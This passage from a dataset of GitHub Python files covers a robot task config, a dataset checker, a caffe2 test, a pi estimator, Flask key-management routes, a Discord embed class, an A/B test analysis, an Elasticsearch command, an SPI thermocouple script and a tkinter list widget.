(\" + serve + \") U (inservezone_serveplate && hotdogready))\" + \" && \" + serve_task_KB\n            \n            #### Buchi version \n            # serve_task_ = \"G (( inservezone_serveplate -> X F (\" + serve + \")))\" + \" && \" + serve_task_KB\n\n        else:\n            raise ValueError('task and robot do not match')\n\n\n        return task_spec, tlconfig.construct_skill_state, tlconfig.PREDICATES, tlconfig.obs_dim\n    \nif __name__ == \"__main__\":\n    pass","repo_name":"xli4217/cbf_learning_feasibility","sub_path":"docker/dirs-to-copy/learning/experiment_config.py","file_name":"experiment_config.py","file_ext":"py","file_size_in_byte":22269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"1732283897","text":"import os\nimport json\n\n\ndef read_json(json_file_path):\n\tjson_cont = None\n\twith open(json_file_path, 'r') as f:\n\t\tjson_cont = json.load(f)\n\treturn json_cont\n\n\n\ndef check_diff(json_cont, img_dir):\n    file_key_list = list(json_cont.keys())\n\n\n    json_img_name = []\n\n    for file_key in file_key_list:\n        image_file_name = json_cont[file_key]['filename']\n        #print(image_file_name)\n        json_img_name.append(image_file_name)\n\n    print(\"The number of image names in the annotated json is {}.\\n\".format(len(json_img_name)))\n    set1_json = set(json_img_name)\n\n    #print(set1)\n\n    img = []\n\n    for files in os.listdir(img_dir):\n        if files.startswith('.') is False and files.endswith('json') is False:\n            img.append(files)\n            # print(files)\n\n    print(\"The number of images in the image directory is {}.\\n\".format(len(img)))\n    set2_img = set(img)\n    diff_in_set1_json_set2_img = set1_json - set2_img\n    if len(diff_in_set1_json_set2_img) == 0:\n        print(\"The number of annotated images in the json is the same as the number of images in the image directory.\\n\")\n    else:\n        print(\"There are {} more annotations in the JSON than the number of images in the image directory.\".format(len(diff_in_set1_json_set2_img)))\n        print(\"\\nThe extra annotations are: \\n{}\\n\".format(diff_in_set1_json_set2_img))\n\n    diff_in_set2_img_set1_json = set2_img - set1_json\n    if len(diff_in_set2_img_set1_json) == 0:\n        print(\"The number of images in the image directory is the same as the number of annotated images in the JSON file.\\n\")\n    else:\n        print(\"{} images present in the image directory are not in the annotated JSON.\".format(len(diff_in_set2_img_set1_json)))\n        print(\"\\nThe extra images are: \\n{}\\n\".format(diff_in_set2_img_set1_json))\n\nif __name__ == '__main__':\n\n    \"\"\"\n    IMG_SOURCE_DIR = folder that stores all batches of images and the json file\n    \"\"\"\n\n    IMG_SOURCE_DIR = '/Users/johnathontoh/Desktop/python_files/dataset/farm_dams/image_source'\n\n    for folder in os.listdir(IMG_SOURCE_DIR):\n        if folder.startswith('.') is False:\n            folder_path = os.path.join(IMG_SOURCE_DIR, folder)\n            for files in os.listdir(folder_path):\n                if files.startswith('.') is False and files.endswith('.json') is True:\n                    print(\"--------------------------\\n\")\n                    print(\"Directory: {}\\n\".format(folder_path))\n                    json_file = read_json(os.path.join(folder_path, files))\n                    check_diff(json_file, folder_path)\n\n\n\n\n\n\n","repo_name":"applecrumble123/MaskRCNN","sub_path":"validate_img_dir_and_json/check_img_and_json.py","file_name":"check_img_and_json.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14817447359","text":"\n\nimport collections\n\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as 
st\nimport numpy as np\nfrom caffe2.python import core, dyndep, workspace\nfrom caffe2.quantization.server.dnnlowp_test_utils import check_quantized_results_close\nfrom hypothesis import given\n\n\ndyndep.InitOpsLibrary(\"//caffe2/caffe2/quantization/server:dnnlowp_ops\")\nworkspace.GlobalInit([\"caffe2\", \"--caffe2_omp_num_threads=11\"])\n\n\nclass DNNLowPDequantizeOpTest(hu.HypothesisTestCase):\n @given(size=st.integers(1024, 2048), is_empty=st.booleans(), **hu.gcs_cpu_only)\n def test_dnnlowp_dequantize(self, size, is_empty, gc, dc):\n if is_empty:\n size = 0\n min_ = -10.0\n max_ = 20.0\n X = (np.random.rand(size) * (max_ - min_) + min_).astype(np.float32)\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"op_type\", \"engine\"])\n outputs = []\n\n op_type_list = [\"Dequantize\", \"Int8Dequantize\"]\n engine = \"DNNLOWP\"\n\n outputs.append(Output(X, op_type=\"\", engine=\"\"))\n\n for op_type in op_type_list:\n net = core.Net(\"test_net\")\n\n quantize = core.CreateOperator(\n \"Quantize\", [\"X\"], [\"X_q\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([quantize])\n\n dequantize = core.CreateOperator(\n op_type, [\"X_q\"], [\"Y\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([dequantize])\n\n self.ws.create_blob(\"X\").feed(X, device_option=gc)\n self.ws.run(net)\n outputs.append(\n Output(Y=self.ws.blobs[\"Y\"].fetch(), op_type=op_type, engine=engine)\n )\n\n check_quantized_results_close(outputs)\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/quantization/server/dequantize_dnnlowp_op_test.py","file_name":"dequantize_dnnlowp_op_test.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"36213685656","text":"import random\r\n\r\n\r\ndef estimate_pi(n):\r\n num_point_circle = 0\r\n num_point_total = 0\r\n for _ in range(n):\r\n x = random.uniform(0, 1)\r\n y = random.uniform(0, 1)\r\n distance = x ** 2 + y ** 2\r\n if distance <= 1:\r\n num_point_circle += 1\r\n num_point_total += 1\r\n\r\n return 4 * num_point_circle / num_point_total\r\n\r\n\r\ndef main():\r\n print(\"Write how many dots you want in your square-circle!\\n\")\r\n x = input()\r\n print(\"Your pi is: \", estimate_pi(int(x)))\r\n\r\n\r\nmain()\r\n","repo_name":"LucaPredieri/EstimatePi","sub_path":"EstimatePi.py","file_name":"EstimatePi.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42093138047","text":"\"\"\"\n Defines routes for key resource\n\"\"\"\n\n# Imports libraries\nfrom functools import reduce\n\n# Import flask objects\nfrom flask import Blueprint, Response, current_app, jsonify, session, \\\n request, abort, make_response\n\n# Import mongo objects\nfrom mongoengine.queryset.visitor import Q\nfrom mongoengine import *\n\n# Import schemas\nfrom ..schemas.key import Key\nfrom ..schemas.user import User\n\n# Import validation\nfrom ..utils.validation import validate_authenticated_admin\n\n# List of possible request parameters\npossible_params: list = [\"tag_number\", \"series_id\", \"sequence_id\",\n \"building\", \"key_type\", \"location\", \"is_available\", \"comment\"]\n\n# Define the blueprint\nblueprint_keys: Blueprint = Blueprint(\n name=\"blueprint_keys\", import_name=__name__)\n\n\n# region Routes\n\n@blueprint_keys.route(\"/keys\", methods=[\"GET\"])\ndef get_all_keys() -> Response:\n \"\"\"Get all keys in the database\n\n Returns:\n Response: A json 
array of all keys in the database\n \"\"\"\n\n # Require admin privileges (abort if failure)\n validate_authenticated_admin()\n\n # Get all keys in the database\n result: list = Key.objects()\n\n # If there was nothing in the database, return an empty list\n if not result:\n return jsonify([])\n\n # Finally, return the result as json\n return jsonify(result)\n\n\n@blueprint_keys.route(\"/keys/<tag_number>\", methods=[\"GET\"])\ndef get_key(tag_number: str) -> Response:\n \"\"\"Get a specific key in the database\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A json of the specific key. Otherwise, a response\n indicating failure.\n \"\"\"\n\n # Require admin privileges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # Return the key as json\n return jsonify(key)\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with getting key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys/<tag_number>/owner\", methods=[\"GET\"])\ndef get_key_owner(tag_number: str) -> Response:\n \"\"\"Get the owner of a specific key in the database\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A json of the specific key's owner. Otherwise, a response\n indicating failure.\n \"\"\"\n\n # Require admin privileges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # Next, find all owners of the key\n owned_users: list = User.objects(Q(owned_keys__in=[key]))\n\n # If there is at least one user who owns this key, return the (first) owner as json\n if owned_users:\n return jsonify(owned_users[0])\n \n # Else, return failure\n return f\"Error! Key does not have an owner!\", 404\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with getting key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys\", methods=[\"POST\"])\ndef add_key() -> Response:\n \"\"\"Add a key to the database\n\n Returns:\n Response: A response indicating whether adding the key was successful\n or not.\n \"\"\"\n\n # Require admin privileges (abort if failure)\n validate_authenticated_admin()\n\n # Get the json from the body\n data: dict = request.get_json()\n\n try:\n\n # Prepare tag number\n # tag_number: str = str(data[\"tag_number\"]).strip()\n\n # Ensure that this key has a unique tag number\n if Key.objects(Q(tag_number=data[\"tag_number\"])):\n return f\"Error! A key with tag number {data['tag_number']} already exists!\", 400\n\n # Ensure that this key has a unique series id and sequence id\n if Key.objects(Q(series_id=data[\"series_id\"]) & Q(sequence_id=data[\"sequence_id\"])):\n return f\"Error! 
A key with series id {data['series_id']} and sequence id {data['sequence_id']} already exists!\", 400\n\n # Build locations\n location_list = str(data[\"location\"]).split(\",\")\n for index, loc in enumerate(location_list):\n location_list[index] = loc.strip()\n\n # Construct new key\n new_key: Key = Key(\n tag_number=str(data[\"tag_number\"]).strip(),\n series_id=str(data[\"series_id\"]).strip(),\n sequence_id=int(data[\"sequence_id\"]),\n building=str(data[\"building\"]).strip(),\n key_type=str(data[\"key_type\"]).strip(),\n location=location_list,\n is_available=str(data[\"is_available\"]).lower() == \"true\",\n comment=str(data[\"comment\"]).strip()\n )\n\n # Now save it into the database\n new_key.save()\n\n # Report done\n tagNum = str(data[\"tag_number\"]).strip()\n return f\"Successfully added key with tag number {tagNum}\", 200\n\n # Handle bad values\n except ValidationError as verror:\n return f\"Error on adding key: {verror}. Regex errors suggest mistakenly using special characters!\", 400\n\n # Handle dictionary key error\n except KeyError as kerror:\n return f\"Error on adding key: {kerror}\", 400\n\n # Handle type error\n except TypeError as terror:\n return f\"Error on adding key: {terror}\", 400\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with adding key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys/<old_tag_number>\", methods=[\"PATCH\"])\ndef update_key(old_tag_number: str) -> Response:\n \"\"\"Update a specific key's properties in the database\n\n Args:\n old_tag_number (str): The current tag number for the key of interest\n\n Returns:\n Response: A response indicating whether updating the key was successful\n or not.\n \"\"\"\n\n # Require admin privileges (abort if failure)\n validate_authenticated_admin()\n\n # Get the json from the body\n data: dict = request.get_json()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=old_tag_number)\n\n ####################################################################################\n # delete if statements checking if in data (ex. if series_id in data)\n # keep the checks for uniqueness\n # if passing those checks, key.update(data)\n # wherever this is called, need to change parameters to pass in old tag number and new tag number\n ####################################################################################\n\n # Ensure that this key has a unique tag number\n # maybe add statement checking if it is the previous tag number\n if Key.objects(Q(tag_number=data[\"tag_number\"])) and data[\"tag_number\"] != old_tag_number:\n return f\"Error! A key with tag number {data['tag_number']} already exists!\", 400\n\n # Ensure that this key has a unique series id and sequence id\n # maybe add statement checking if it is the previous series and sequence id\n if Key.objects(Q(series_id=data[\"series_id\"]) & Q(sequence_id=data[\"sequence_id\"])) and key.series_id != data[\"series_id\"] and key.sequence_id != data[\"sequence_id\"]:\n return f\"Error! A key with series id {data['series_id']} and sequence id {data['sequence_id']} already exists!\", 400\n\n # Update tag number\n # if \"tag_number\" in data:\n # # Ensure that this key has a unique tag number\n # if Key.objects(Q(tag_number=data[\"tag_number\"])):\n # return f\"Error! 
A key with tag number {data['tag_number']} already exists!\", 400\n\n key.update(set__tag_number=str(data[\"tag_number\"]).strip())\n\n # Update series id\n key.update(set__series_id=str(data[\"series_id\"]).strip())\n\n # Update sequence id\n key.update(set__sequence_id=int(data[\"sequence_id\"]))\n\n # Update building\n key.update(set__building=str(data[\"building\"]).strip())\n\n # Update key type\n key.update(set__key_type=str(data[\"key_type\"]).strip())\n\n # Update location\n if \"location\" in data:\n # Build locations\n location_list = str(data[\"location\"]).split(\",\")\n for index, loc in enumerate(location_list):\n # Remove unnecessary elements from loc\n location_list[index] = loc.replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").strip()\n key.update(set__location=location_list)\n \n # Update comment\n key.update(set__comment=str(data[\"comment\"]).strip())\n\n # Report done\n return f\"Successfully updated key with tag number {data['tag_number']}\", 200\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {old_tag_number} does not exist!\", 404\n\n # Handle bad values\n except ValidationError as verror:\n return f\"Error on updating key: {verror}. Regex errors suggest mistakenly using special characters!\", 400\n\n # Handle dictionary key error\n except KeyError as kerror:\n return f\"Error on updating key: {kerror}\", 400\n\n # Handle type error\n except TypeError as terror:\n return f\"Error on updating key: {terror}\", 400\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with updating key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys/<tag_number>/return\", methods=[\"PATCH\"])\ndef return_key(tag_number: str) -> Response:\n \"\"\"Safely return a key back to the system\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A response indicating whether returning the key was successful\n or not.\n \"\"\"\n\n # Require admin privileges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # We need to find all users who have this key owned\n owned_users: list = User.objects(Q(owned_keys__in=[key]))\n\n # If there is at least one user who owns this key, fail\n # because we cannot safely return the key\n if owned_users:\n return f\"Error! Cannot return key because {owned_users[0].pid} still owns it!\", 400\n\n # Mark the key as available\n key.update(set__is_available=True)\n\n # Report done\n return f\"Successfully returned key with tag number {tag_number}\", 200\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! 
Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with returning key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys/<tag_number>\", methods=[\"DELETE\"])\ndef delete_key(tag_number: str) -> Response:\n \"\"\"Delete a specific key in the database\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A response indicating whether deleting the key was successful\n or not.\n \"\"\"\n\n # Require admin privileges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # We need to find all users who have this key owned\n owned_users: list = User.objects(Q(owned_keys__in=[key]))\n\n # Delete this key off the owned keys array for all users\n for user in owned_users:\n user.owned_keys.remove(key) # remove the key\n user.save() # save user details in database\n\n # Now delete the key off the system entirely\n key.delete()\n\n # Report done\n return f\"Successfully deleted key with tag number {tag_number}\", 200\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with deleting key: {e}\", 400\n\n# endregion\n","repo_name":"pasha-ran/capstone","sub_path":"keymanagementsystem/backend/src/routes/blueprint_keys.py","file_name":"blueprint_keys.py","file_ext":"py","file_size_in_byte":12209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} {"seq_id":"13504062836","text":"class Embed:\n def __init__(\n self,\n title: str,\n description: str,\n color: int,\n ):\n self.title = title\n self.description = description\n self.color = color\n self.footer = {}\n self.author = {}\n self.fields = []\n\n def set_footer(self, text: str, icon_url: str = None):\n self.footer = {\n \"text\": text,\n \"icon_url\": icon_url,\n }\n\n def set_author(self, name: str, url: str = None, icon_url: str = None):\n self.author = {\n \"name\": name,\n \"url\": url,\n \"icon_url\": icon_url,\n }\n\n def add_field(self, name: str, value: str, inline: bool = False):\n self.fields.append({\n \"name\": name,\n \"value\": value,\n \"inline\": inline,\n })\n\n def to_dict(self):\n return {\n \"title\": self.title,\n \"description\": self.description,\n \"color\": self.color,\n \"footer\": self.footer,\n \"author\": self.author,\n \"fields\": self.fields,\n }","repo_name":"Jeff53978/MicroCord","sub_path":"microcord/embed.py","file_name":"embed.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} {"seq_id":"30148276345","text":"# Cookie Cats is a hugely popular mobile puzzle game developed by Tactile Entertainment.\n# It's a classic \"connect three\" style puzzle game where the player must connect tiles of the same color in order to\n# clear the board and win the level. It also features singing cats. 
We're not kidding!\n#\n# As players progress through the game they will encounter gates that force them\n# to wait some time before they can progress or make an in-app purchase.\n# In this project, we will analyze the result of an A/B test where the first gate in Cookie Cats was moved from level 30 to level 40.\n# In particular, we will analyze the impact on player retention.\n#\n# To complete this project, you should be comfortable working with pandas DataFrames and with using the pandas plot method.\n# You should also have some understanding of hypothesis testing and bootstrap analysis.\n\n# userid - a unique number that identifies each player.\n# version - whether the player was put in the control group (gate_30 - a gate at level 30) or the test group (gate_40 - a gate at level 40).\n# sum_gamerounds - the number of game rounds played by the player during the first week after installation.\n# retention_1 - did the player come back and play 1 day after installing?\n# retention_7 - did the player come back and play 7 days after installing?\n# When a player installed the game, he or she was randomly assigned to either gate_30 or gate_40.\n\n\nimport itertools\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# !pip install statsmodels\nimport statsmodels.stats.api as sms\nfrom scipy.stats import ttest_1samp, shapiro, levene, ttest_ind, mannwhitneyu, \\\n pearsonr, spearmanr, kendalltau, f_oneway, kruskal\nfrom statsmodels.stats.proportion import proportions_ztest\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', 10)\npd.set_option('display.float_format', lambda x: '%.5f' % x)\n\n# Data Preparing\n\ndf_ = pd.read_csv(\"Data/cookie_cats.csv\")\ndf = df_.copy()\ndf.head()\n\n# Data Control\ndef check_df(dataframe, head=5):\n print(\"##################### Shape #####################\")\n print(dataframe.shape)\n print(\"##################### Types #####################\")\n print(dataframe.dtypes)\n print(\"##################### Head #####################\")\n print(dataframe.head(head))\n print(\"##################### Tail #####################\")\n print(dataframe.tail(head))\n print(\"##################### NA #####################\")\n print(dataframe.isnull().sum())\n print(\"##################### Quantiles #####################\")\n print(dataframe.describe([0, 0.05, 0.50, 0.95, 0.99, 1]).T)\n\ncheck_df(df)\n\n# Outlier Check\n\ndef outlier_thresholds(dataframe, col_name, q1=0.25, q3=0.75):\n quartile1 = dataframe[col_name].quantile(q1)\n quartile3 = dataframe[col_name].quantile(q3)\n interquantile_range = quartile3 - quartile1\n up_limit = quartile3 + 1.5 * interquantile_range\n low_limit = quartile1 - 1.5 * interquantile_range\n return low_limit, up_limit\n\ndef check_outlier(dataframe, col_name):\n low_limit, up_limit = outlier_thresholds(dataframe, col_name)\n if dataframe[(dataframe[col_name] > up_limit) | (dataframe[col_name] < low_limit)].any(axis=None):\n return True\n else:\n return False\n\ndef replace_with_thresholds(dataframe, variable, q1=0.25, q3=0.75):\n low_limit, up_limit = outlier_thresholds(dataframe, variable, q1=0.25, q3=0.75)\n dataframe.loc[(dataframe[variable] < low_limit), variable] = low_limit\n dataframe.loc[(dataframe[variable] > up_limit), variable] = up_limit\n\n\noutlier_thresholds(df,\"sum_gamerounds\")\ncheck_outlier(df,\"sum_gamerounds\")\nreplace_with_thresholds(df,\"sum_gamerounds\")\ncheck_outlier(df,\"sum_gamerounds\")\n\n# HYPOTHESIS\n\n\"\"\" \nHO : M1 = M2 : There is no 
statistically significant difference between Version A and Version B\nH1 : M1 != M2 : There is a statistically significant difference between Version A and Version B\n\"\"\"\n\n# Let's take a look at the averages of version usage.\n\ndf.groupby(\"version\").agg({\"sum_gamerounds\": \"mean\"})\n\n# AB Testing (Independent Two-Sample T-Test)\n\n# After checking the normality assumption and variance homogeneity,\n# we will decide to apply a parametric or non-parametric test.\n\n############################\n# Normality Assumption\n############################\n\n# H0: Normal distribution assumption is provided.\n# H1: The assumption of normal distribution is not provided.\n\ntest_stat, pvalue = shapiro(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"])\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 0.7756, p-value = 0.0000\n\ntest_stat, pvalue = shapiro(df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 0.7732, p-value = 0.0000\n\n\"We reject H0 because p-value < 0.05.\"\n\n############################\n# Assumption of Variance Homogeneity\n############################\n# Actually, in this instance we do not need to check the homogeneity of variance,\n# because the assumption of normality was already rejected.\n# In that case we should automatically use a non-parametric method.\n\n# H0: Variances are Homogeneous\n# H1: Variances Are Not Homogeneous\n\ntest_stat, pvalue = levene(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 0.8786, p-value = 0.3486\n\n\"We cannot reject H0; variances are homogeneous, but we must still use a non-parametric test.\"\n\n############################\n# Mann Whitney U Test\n############################\n\ntest_stat, pvalue = mannwhitneyu(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])\n\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 1024214124.5000, p-value = 0.0537\n\n\"We cannot reject H0; there is no statistically significant difference between Version A and Version B.\"\n\n\n# Functionalization A/B Test\n\ndef AB_Test(df, pthres=0.05):\n # H0: There is no statistical difference between the gate_30 and the gate_40.\n\n print(df.groupby('version').agg({\"sum_gamerounds\": [\"count\", \"mean\"]}))\n\n print(\"NORMAL DISTRIBUTION ASSUMPTION\".center(70, \"*\"))\n\n # H0 : The compared groups have a normal distribution\n\n pvalue_gate_30 = shapiro([df[\"version\"] == \"gate_30\"])[1]\n pvalue_gate_40 = shapiro([df[\"version\"] == \"gate_40\"])[1]\n\n print('p-value_gate30 = %.5f' % (pvalue_gate_30))\n print('p-value_gate40 = %.5f' % (pvalue_gate_40))\n\n if (pvalue_gate_30 < pthres) & (pvalue_gate_40 < pthres):\n print(\"Normality H0 is rejected.\\n\\n\")\n else:\n print(\"Normality H0 is not rejected.\\n\")\n\n print(\"VARIANCE HOMOGENEOUS ASSUMPTION \".center(70, \"*\"))\n\n # H0 : The variance of the compared groups is homogeneous.\n\n p_value_levene = levene(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])[1]\n\n print('p_value_levene = %.5f' % p_value_levene)\n\n if p_value_levene < pthres:\n print(\"Variance Homogeneity H0 is rejected.\\n\")\n else:\n print(\"Variance Homogeneity H0 is not rejected.\\n\")\n\n if ((pvalue_gate_30 > pthres) & 
(pvalue_gate_40 > pthres)) & (p_value_levene > pthres):\n p_value_ttest = ttest_ind(df.loc[df[\"version\"] == \"gate_30\"],\n df.loc[df[\"version\"] == \"gate_40\"],\n equal_var=True)[1]\n\n print('p_value_ttest = %.5f' % p_value_ttest)\n\n elif ((pvalue_gate_30 > pthres) & (pvalue_gate_40 > pthres)) & (p_value_levene < pthres):\n p_value_ttest = ttest_ind(df.loc[df[\"version\"] == \"gate_30\"],\n df.loc[df[\"version\"] == \"gate_40\"],\n equal_var=False)[1]\n\n print('p_value_ttest = %.5f' % p_value_ttest)\n else:\n print(\"A non-parametric test should be used.\\n\\n\")\n pvalue = mannwhitneyu(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])[1]\n\n print('p_value = %.5f' % pvalue)\n\n print(\" RESULT \".center(70, \"*\"))\n\n if pvalue < pthres:\n print(\n f\"p-value {round(pvalue, 5)} < {pthres}. H0 is rejected. That is, there is a statistically significant difference between them.\")\n\n else:\n print(\n f\"p-value > {pthres}. H0 is not rejected. That is, there is no statistically significant difference between them; the observed difference arose by chance.\")\n\n\nAB_Test(df, 0.05)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"HakanGnes/Mobil-Gaming-AB-Test","sub_path":"Mobil Gaming AB test.py","file_name":"Mobil Gaming AB test.py","file_ext":"py","file_size_in_byte":8691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"73674262314","text":"from django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search, Q\nfrom ...utils import get_registration_status_color\nimport traceback\n\n\nclass Command(BaseCommand):\n help = 'Sets registration_status_color for ES records'\n\n def handle(self, *args, **options):\n # Initialize the ElasticSearch client\n es = Elasticsearch(settings.ELASTIC_HOST, timeout=settings.ELASTIC_TIMEOUT)\n query = Q(\n \"match\",\n search_data__obj_state=2,\n ) & ~Q(\n 'query_string',\n query=\"_exists_:search_data.registration_status_color\"\n )\n s = Search().using(es).query(query)\n for h in s.scan():\n body = h.to_dict()\n try:\n body['search_data']['registration_status_color'] = get_registration_status_color(body)\n except:\n self.stdout.write(self.style.ERROR(f\"Error in {h.meta.id}\"))\n error_traceback = traceback.format_exc()\n self.stdout.write(error_traceback)\n es.index(index=settings.ELASTIC_INDEX_NAME,\n doc_type='_doc',\n id=h.meta.id,\n body=body,\n request_timeout=30)\n self.stdout.write(self.style.SUCCESS('Finished'))\n","repo_name":"alexmon1989/uma","sub_path":"apps/search/management/commands/set_registration_status_color.py","file_name":"set_registration_status_color.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"1926515261","text":"# _*_ coding:utf-8 _*_\n\nfrom time import sleep\nimport spidev\nspi = spidev.SpiDev()\n\nspi.open(0,0)\t\t\t# use /sys/bus/spi/devices/dev0.0\nspi.mode = 0x03\t\t\t# mode 3 CPOL:1 CPHA:1 cpha must be 1\nspi.max_speed_hz = 1000000\t# maximum clock frequency\n\nresp = spi.xfer([0x81,0x03])\t# select the K-type thermocouple\nresp = spi.xfer([0x80,0xC1])\t# start a measurement\nsleep(0.1)\t\t\t# wait for the measurement\n\nprint(\"Values of all registers\")\nprint(\"Address Value\")\nresp = spi.readbytes(17)\nfor i in range(1,len(resp)):\n\tprint(\"{0:02X}h {1:02X}h\".format(i-1,resp[i]))\n\ndummy = 0\nresp = spi.xfer2([0x0C,0x0D,0x0E,dummy])\t# read the thermocouple temperature\nvalue = resp[1] * 256 + resp[2]\nif (resp[1] & 
0x80) != 0:\n\tvalue = -1 * (~(value - 1) & 0x7FFF)\t# convert two's complement to decimal\nprint(\"Thermocouple temperature :{}℃\".format(value*0.0625))\n\nresp = spi.xfer2([0x0A,0x0B,dummy])\t\t# read the cold-junction temperature\nvalue = (resp[1] << 6) + (resp[2] >> 2)\nif (resp[1] & 0x80) != 0:\n\tvalue = -1 * (~(value - 1) & 0x7FFF)\t# convert two's complement to decimal\nprint(\"Cold-junction temperature :{}℃\".format(value*0.015625))\n\nspi.close()\n","repo_name":"garameki/spi","sub_path":"testMax31856_with_K.py","file_name":"testMax31856_with_K.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"6719506329","text":"from PIL import Image, ImageTk\nfrom os import listdir\nfrom os.path import isfile, join\nimport math\nfrom CommonFunctions import resize_image_by_height\n\n\nclass ClickableList:\n def __init__(self, x, y, w, h, canvas, parent):\n self.parent = parent\n self.x = x\n self.y = y\n img_prev = Image.open('obrazky/prev.png')\n img_prev = resize_image_by_height(img_prev, 40)\n img_next = Image.open('obrazky/next.png')\n img_next = resize_image_by_height(img_next, 40)\n self.prev_arrow = ImageTk.PhotoImage(img_prev)\n self.next_arrow = ImageTk.PhotoImage(img_next)\n self.height = h\n self.width = w\n self.buttons = []\n self.canvas = canvas\n self.parent.solve_screen_keyboard.hide()\n self.line_h = 60\n self.item_h = 45\n self.bottom_pad = 40\n self.top_pad = 40\n self.shift = int(self.width / 15)\n self.col_width = int(w/2)\n self.on_one_page = math.floor((self.height - self.bottom_pad - self.top_pad) / self.line_h) * 2\n self.current_page = 0\n self.pages = []\n self.load_buttons()\n self.draw_page_buttons()\n\n self.selected = None\n self.draw()\n\n def remove(self):\n self.remove_current_page()\n self.canvas.delete(self.prev_arrow_obj)\n self.canvas.delete(self.next_arrow_obj)\n\n def load_buttons(self):\n x = self.x + self.width / 2.1 + self.shift\n y = self.y + self.top_pad\n mypath = \"sady_uloh\"\n all_files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n for button in all_files:\n self.buttons.append(ListButton(x - self.col_width/2, y, int((self.width/2) - 100),\n self.item_h, button.split(\".\")[0], self.canvas, self.shift, self))\n y += self.line_h\n\n i = 0\n while i < len(self.buttons):\n self.pages.append((i, i + self.on_one_page - 1))\n i += self.on_one_page\n\n def deselect_all(self):\n for button in self.buttons:\n if button.selected:\n button.leave(None)\n\n def draw_page_buttons(self):\n x = self.x + self.width / 2\n y = self.y + self.height - 40\n self.prev_arrow_obj = self.canvas.create_image(x - self.bottom_pad, y, image=self.prev_arrow, anchor=\"c\")\n self.next_arrow_obj = self.canvas.create_image(x + self.bottom_pad, y, image=self.next_arrow, 